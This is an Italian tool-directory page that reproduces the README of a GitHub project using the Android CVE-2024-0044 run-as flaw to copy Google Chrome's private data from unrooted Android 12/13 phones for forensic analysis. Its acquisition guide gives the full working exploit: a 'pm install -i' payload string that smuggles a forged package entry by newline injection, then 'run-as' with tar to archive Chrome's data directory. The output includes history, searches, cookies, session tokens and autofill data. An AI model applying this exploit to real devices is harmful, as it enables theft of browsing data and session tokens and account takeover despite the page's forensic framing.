Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Chrome-Forensic_CVE-2024-0044 — Un robusto strumento di digital forensics per l'estrazione e l'analisi degli artefatti di Google Chrome da dispositivi Android. | Kitploit
Strumenti/GitHubGitHub/jacktekno/chrome-forensic_cve-2024-0044
Sicurezza AndroidAnalisi delle VulnerabilitàExploitInformatica ForenseMobile ForensicsRecupero DatiDigital ForensicsSicurezza MobileApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubjacktekno/chrome-forensic_cve-2024-0044

Chrome-Forensic_CVE-2024-0044

Un robusto strumento di digital forensics per l'estrazione e l'analisi degli artefatti di Google Chrome da dispositivi Android.

Vedi Repository
17 mesi faNon ancora revisionato

🔍 Chrome Forensic - CVE-2024-0044

Version Python License Platform

Un robusto strumento di digital forensics per estrarre e analizzare gli artefatti di Google Chrome da dispositivi Android

Funzionalità • Installazione • Utilizzo • Documentazione


👤 Informazioni sull'autore

Autore: JackTekno
GitHub: github.com/JackTekno


📋 Panoramica

Questo strumento sfrutta la vulnerabilità CVE-2024-0044 (Run-as) per bypassare le restrizioni di autorizzazione su dispositivi Android 12/13 non rooted, consentendo l'estrazione forense dei dati di Google Chrome. Lo strumento analizza i database SQLite grezzi e genera rapporti di analisi completi.

🔄 Flusso di processo

Diagramma di flusso dell'analisi forense

Flusso di lavoro completo dell'analisi forense, dall'acquisizione alla generazione del report


📊 Funzionalità e output

Lo strumento genera un report Excel completo (result_chrome_forensic.xlsx) con i seguenti fogli:


🛠️ Prerequisiti

Requisiti hardware

  • 📱 Telefono Android (Android 12/13)
  • 💻 PC (Linux/Windows/Mac)

Ambiente testato

  • 🐧 OS: Linux UOS 20 Professional

Requisiti software

  • 🐍 Python 3.x
  • 📲 ADB (Android Debug Bridge)
  • 📦 File APK fittizio (es. F-Droid.apk)

🚀 Installazione

  1. Clona il repository

    root@kitploit:~
    git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
    cd Chrome-Forensic_CVE-2024-0044
    
  2. Installa le dipendenze

    root@kitploit:~
    pip install -r requirements.txt
    

🔓 Guida all'acquisizione dei dati

Passo 1: Preparare il dispositivo

  1. Vai su Impostazioni → Informazioni sul telefono
  2. Tocca Numero build 7 volte per abilitare le Opzioni sviluppatore
  3. Vai su Impostazioni → Sistema → Opzioni sviluppatore
  4. Abilita Debug USB
  5. Collega il telefono al PC tramite USB e autorizza la connessione

Passo 2: Preparare l'exploit

root@kitploit:~
# Invia un APK fittizio nella cartella temporanea
adb push F-Droid.apk /data/local/tmp/base.apk

Passo 3: Trovare l'UID di destinazione

root@kitploit:~
adb shell pm list packages -U | grep com.android.chrome
# Esempio di output: package:com.android.chrome uid:10129
# Annota l'UID (es. 10129)

Passo 4: Eseguire l'exploit

⚠️ Sostituisci 10129 con il tuo UID effettivo di Chrome dal Passo 3

root@kitploit:~
adb shell

# All'interno della shell ADB:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"

# Attiva il package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk

Passo 5: Estrarre i dati

root@kitploit:~
# Ancora all'interno della shell ADB
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar

# Esci dalla shell ADB
exit

Passo 6: Trasferire i dati al PC

root@kitploit:~
adb pull /data/local/tmp/chrome.tar .

Passo 7: Decomprimere i dati

Estrai il file 'chrome.tar' nella cartella del progetto. Non è necessario spostare i file manualmente. Lo script Python troverà automaticamente i file di database all'interno delle cartelle estratte.

root@kitploit:~
tar -xf chrome.tar

💻 Utilizzo

Esegui lo strumento di analisi forense:

root@kitploit:~
python3 chrome_forensic.py

Lo strumento analizzerà i file di database e genererà result_chrome_forensic.xlsx nella stessa directory.


⚖️ Disclaimer legale

⚠️ IMPORTANTE: Questo strumento è progettato esclusivamente per scopi educativi e di analisi forense autorizzata.

  • Utilizzalo solo su dispositivi di tua proprietà o per i quali hai esplicita autorizzazione scritta.
  • L'accesso non autorizzato a dispositivi digitali potrebbe violare le leggi della tua giurisdizione.
  • Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo strumento.

🤝 Contributi

I contributi sono benvenuti! Sentiti libero di inviare una Pull Request.


📄 Licenza

Questo progetto è concesso in licenza secondo la GNU General Public License v3.0. Vedi il file LICENSE per i dettagli.


👤 Crediti

Il proof of concept del metodo di acquisizione è stato riassunto e condiviso da Tinyhack.com.


Realizzato con ❤️ da JackTekno

⭐ Metti una stella • 🐛 Segnala un bug • 💡 Richiedi una funzionalità

Scarica lo strumento
Nome foglioDescrizione
📖 Cronologia di navigazioneSequenza temporale dettagliata degli URL visitati
📈 Analytics – Siti principaliClassifica statistica dei domini più visitati
⚠️ ALERT – SospettiURL contrassegnati automaticamente (hacking, droga, contenuti per adulti)
📥 DownloadStorico download con percorsi e dimensioni file
🔍 Termini di ricercaQuery di ricerca dell'utente dalla barra degli indirizzi/Google
🍪 Cookie e sessioniToken di sessione e metadati dei cookie (crittografati in esadecimale)
✍️ Dati di compilazione automaticaDati dei moduli salvati (nomi, indirizzi, ecc.)